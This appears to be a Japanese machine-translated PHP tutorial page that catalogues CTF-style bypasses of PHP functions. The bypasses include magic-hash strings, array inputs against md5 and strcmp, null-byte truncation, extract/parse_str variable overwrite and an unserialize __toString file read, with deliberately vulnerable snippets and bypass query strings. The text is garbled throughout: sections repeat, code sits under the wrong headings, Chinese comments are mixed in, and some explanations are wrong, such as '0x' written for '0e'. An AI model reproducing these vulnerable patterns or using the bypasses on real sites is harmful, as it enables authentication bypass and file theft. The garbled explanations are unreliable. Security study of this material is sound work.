ホームページ >バックエンド開発 >PHPチュートリアル >PHP 関数のいくつかの抜け穴のコレクションを共有する

PHP 関数のいくつかの抜け穴のコレクションを共有する

小云云
小云云オリジナル
2018-03-13 13:53:564389ブラウズ


この記事は主に、PHP 関数のいくつかの抜け穴のコレクションを共有するものであり、皆様のお役に立てれば幸いです。

1. 弱い型の比較

PHP 関数のいくつかの抜け穴のコレクションを共有する

2. MD5比較の脆弱性

PHPがハッシュ値を実行するために「!=」または「==」を使用する場合、 「0x」で始まる各ハッシュ値を科学的表記法の 0 の累乗 (0) として解釈するため、2 つの異なるパスワードがハッシュ化される場合、それらのハッシュ値は両方とも「0e」で始まる場合、php はそれらが「0e」であると認識します。同じ。

一般的なペイロードには

0x01 md5(str)
    QNKCDZO
    240610708
    s878926199a
    s155964671a
    s214587387a
    s214587387a
0x02 sha1(str)
    sha1('aaroZmOk')  
    sha1('aaK1STfY')
    sha1('aaO8zKZF')
    sha1('aa3OFF9m')

が含まれます。同時に、MD5 は配列を処理できません。以下の判断が行われた場合、配列を使用して

if(@md5($_GET['a']) == @md5($_GET['b']))
{
    echo "yes";
}
//http://127.0.0.1/1.php?a[]=1&b[]=2

3.ereg 関数の脆弱性: 00 truncation
ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE

文字列比較解析を回避できます。 $_GET[ 'password'] が配列の場合、戻り値は NULL になります

123 || asd || 123%00&&&** の場合、戻り値は true になります


4. $key とは何ですか?

プログラムは変数自体のキーを変数として抽出し、それを処理のために関数に渡すことができることを忘れないでください。
<?php
    print_r(@$_GET); 
    foreach ($_GET AS $key => $value)
    {        print $key."\n";
    }?>

5. 変数のカバレッジ

関係する主な関数は、extract 関数です。例を見てみましょう。プロセス ページは非常に単純です。


同時に! PHP の機能 $ を使用すると、変数名を割り当てることができ、変数を上書きすることもできます。

<?php  
    $auth = &#39;0&#39;;  
    // 这里可以覆盖$auth的变量值
    print_r($_GET);    echo "</br>";
    extract($_GET); 
    if($auth == 1){  
        echo "private!";  
    } else{  
        echo "public!";  
    }  
?>
目標を達成するには、http://127.0.0.1:8080/test.php?a=12 を構築します。 PHP 関数のいくつかの抜け穴のコレクションを共有する

6.strcmp

<?php  
    $a=&#39;hi&#39;;    foreach($_GET as $key => $value) {        echo $key."</br>".$value;        $$key = $value;
    }    print "</br>".$a;?>
如果 str1 小于 str2 返回 < 0; 如果 str1 大于 str2 返回 > 0;如果两者相等,返回 0。 
先将两个参数先转换成string类型。 
当比较数组和字符串的时候,返回是0。 
如果参数不是string类型,直接return
http://127.0.0.1:8080/test.php?a=12 即可达到目的。

6.strcmp

<?php
    $password=$_GET[&#39;password&#39;];    if (strcmp(&#39;xd&#39;,$password)) {     echo &#39;NO!&#39;;
    } else{        echo &#39;YES!&#39;;
    }?>
<?phpecho is_numeric(233333);       # 1echo is_numeric(&#39;233333&#39;);    # 1echo is_numeric(0x233333);    # 1echo is_numeric(&#39;0x233333&#39;);   # 1echo is_numeric(&#39;233333abc&#39;);  # 0?>

构造http://127.0.0.1:8080/test.php?password[]=Constructionhttp://127.0.0.1:8080/test.php?password[]=

7.is_numeric

言うまでもなく:

<?php$ip = &#39;asd 1.1.1.1 abcd&#39;; // 可以绕过if(!preg_match("/(\d+)\.(\d+)\.(\d+)\.(\d+)/",$ip)) {  die(&#39;error&#39;);
} else {   echo(&#39;key...&#39;);
}?>

8.preg_match

正規表現マッチングを実行する際に文字列(^と$)の先頭と末尾に制限がない場合、バイパスの問題が発生する可能性があります

<?php
    $var=&#39;init&#39;;  
    print $var."</br>";
    parse_str($_SERVER[&#39;QUERY_STRING&#39;]);  
    echo $_SERVER[&#39;QUERY_STRING&#39;]."</br>";    print $var;?>

9.parse_str

parse_str() と同様の関数は mb_parse_str() です。parse_str は文字列を複数の変数に解析します。パラメータ str が URL によって渡されたクエリ文字列である場合、それは変数に解析され、現在のスコープに設定されます。
変数の上書きの一種

<?php  
    echo 0 == &#39;a&#39; ;// a 转换为数字为 0    重点注意
    // 0x 开头会被当成16进制54975581388的16进制为 0xccccccccc
    // 十六进制与整数,被转换为同一进制比较
    &#39;0xccccccccc&#39; == &#39;54975581388&#39; ;    // 字符串在与数字比较前会自动转换为数字,如果不能转换为数字会变成0
    1 == &#39;1&#39;;    1 == &#39;01&#39;;    10 == &#39;1e1&#39;;    &#39;100&#39; == &#39;1e2&#39; ;    

    // 十六进制数与带空格十六进制数,被转换为十六进制整数
    &#39;0xABCdef&#39;  == &#39;     0xABCdef&#39;;    echo &#39;0010e2&#39; == &#39;1e3&#39;;    // 0e 开头会被当成数字,又是等于 0*10^xxx=0
    // 如果 md5 是以 0e 开头,在做比较的时候,可以用这种方法绕过
    &#39;0e509367213418206700842008763514&#39; == &#39;0e481036490867661113260034900752&#39;;    &#39;0e481036490867661113260034900752&#39; == &#39;0&#39; ;

    var_dump(md5(&#39;240610708&#39;) == md5(&#39;QNKCDZO&#39;));
    var_dump(md5(&#39;aabg7XSs&#39;) == md5(&#39;aabC9RqS&#39;));
    var_dump(sha1(&#39;aaroZmOk&#39;) == sha1(&#39;aaK1STfY&#39;));
    var_dump(sha1(&#39;aaO8zKZF&#39;) == sha1(&#39;aa3OFF9m&#39;));?>
11.unset

unset(bar); リクエストパラメータに変数barが含まれている場合、それを破棄します。プログラム ロジックをバイパスするには、いくつかの変数を破棄します。
<?php  $_CONFIG[&#39;extraSecure&#39;] = true;foreach(array(&#39;_GET&#39;,&#39;_POST&#39;) as $method) {    foreach($$method as $key=>$value) {      // $key == _CONFIG
      // $$key == $_CONFIG
      // 这个函数会把 $_CONFIG 变量销毁
      unset($$key);
    }
}if ($_CONFIG[&#39;extraSecure&#39;] == false) {    echo &#39;flag {****}&#39;;
}?>

12.intval()

intから文字列へ:
$var = 5;  
方式1:$item = (string)$var;  
方式2:$item = strval($var);

文字列からintへ: intval()関数。

var_dump(intval(&#39;2&#39;)) //2  var_dump(intval(&#39;3abcd&#39;)) //3  var_dump(intval(&#39;abcd&#39;)) //0 可以使用字符串-0转换,来自于wechall的方法

intval() を変換するときに、文字列の先頭から数値以外の文字が検出されるまで変換されることを説明します。変換できない文字列が現れても intval() はエラーにはならずに 0 を返します

ちなみに intval は %00 で切り捨てることができます

if($req[&#39;number&#39;]!=strval(intval($req[&#39;number&#39;]))){     $info = "number must be equal to it&#39;s integer!! ";  
}

$req['number']=0%00 とすれば可能ですbypassed

13.switch()

switchが数値型の場合判定の場合、switchはパラメータをint型に変換し、効果はintval関数と同等になります。次のように:
<?php
    $i ="abc";  
    switch ($i) {  
    case 0:  
    case 1:  
    case 2:  
    echo "i is less than 3 but not negative";  
    break;  
    case 3:  
    echo "i is 3";  
    } 
?>

14.in_array()

$array=[0,1,2,&#39;3&#39;];  
var_dump(in_array(&#39;abc&#39;, $array)); //true  var_dump(in_array(&#39;1bc&#39;, $array)); //true
PHP が int とみなす文字列を入力すると、変換が強制されます

15.脆弱性のシリアル化とシリアル化解除

这里我们先简单介绍一下php中的魔术方法(这里如果对于类、对象、方法不熟的先去学学吧),即Magic方法,php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __construct, __destruct,__toString,__sleep,__wakeup等等。这些函数都会在某些特殊时候被自动调用。 
例如__construct()方法会在一个对象被创建时自动调用,对应的__destruct则会在一个对象被销毁时调用等等。 
这里有两个比较特别的Magic方法,__sleep 方法会在一个对象被序列化的时候调用。 __wakeup方法会在一个对象被反序列化的时候调用。
<?phpclass test{
    public $username = &#39;&#39;;    public $password = &#39;&#39;;    public $file = &#39;&#39;;    public function out(){
        echo "username: ".$this->username."<br>"."password: ".$this->password ;
    }     public function __toString() {
        return file_get_contents($this->file);
    }
}$a = new test();$a->file = &#39;C:\Users\YZ\Desktop\plan.txt&#39;;echo serialize($a);?>//tostring方法会在输出实例的时候执行,如果实例路径是隐秘文件就可以读取了
echo unserialize は __tostring をトリガーしますfunction 、C:UsersYZDesktopplan.txt ファイルは以下で読むことができます
<?phpclass test{
    public $username = &#39;&#39;;    public $password = &#39;&#39;;    public $file = &#39;&#39;;    public function out(){
        echo "username: ".$this->username."<br>"."password: ".$this->password ;
    }     public function __toString() {
        return file_get_contents($this->file);
    }
}$a = &#39;O:4:"test":3:{s:8:"username";s:0:"";s:8:"password";s:0:"";s:4:"file";s:28:"C:\Users\YZ\Desktop\plan.txt";}&#39;;echo unserialize($a);?>

16.session 逆シリアル化の脆弱性

主な理由は ini_set('session.serialize_handler', 'php_serialize'); です。 ', 'php');

この 2 つはセッションの処理方法が異なります

UsersYZDesktopplan.txt";}';echo unserialize($a);?>


16.session デシリアライズの脆弱性

主な理由は ini_set('session.serialize_handler', 'php_serialize'); ini_set('session.serialize_handler', 'php');

この 2 つはセッションの処理方法が異なります

関連する推奨事項:


いくつかのセキュリティ脆弱性とそれに対応する予防策デシリアライゼーションオブジェクトインジェクションの脆弱性に関する対策

php

ファイルの脆弱性に関するおすすめの記事9件

以上がPHP 関数のいくつかの抜け穴のコレクションを共有するの詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。